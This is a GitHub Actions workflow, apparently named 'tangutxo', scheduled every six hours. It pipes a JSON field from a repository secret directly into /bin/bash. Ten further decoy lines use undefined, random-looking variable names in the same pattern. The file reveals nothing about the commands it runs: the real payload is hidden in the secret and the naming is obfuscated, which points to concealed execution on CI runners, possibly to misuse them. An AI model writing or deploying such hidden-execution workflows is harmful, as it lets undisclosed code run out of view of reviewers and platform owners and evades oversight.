name: tangutxo

on:
  workflow_dispatch:
  schedule:
    - cron: '35 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tangutxo
        env:
          t22: ${{ secrets.t22 }}
        run: |
          echo $t22 | jq -r .vdjf918 | /bin/bash
          echo $ik08707 | jq -r .lf30 | /bin/bash
          echo $kw51627 | jq -r .wdif27364 | /bin/bash
          echo $be683 | jq -r .oysh5 | /bin/bash
          echo $zgn72436 | jq -r .vrl46 | /bin/bash
          echo $ioula11101 | jq -r .zams73405 | /bin/bash
          echo $l1 | jq -r .ydom4792 | /bin/bash
          echo $bc24501 | jq -r .bjqfs8182 | /bin/bash
          echo $xr9 | jq -r .qt61334 | /bin/bash
          echo $ogo1175 | jq -r .ecday4 | /bin/bash
          echo $bqoem0097 | jq -r .yf40 | /bin/bash

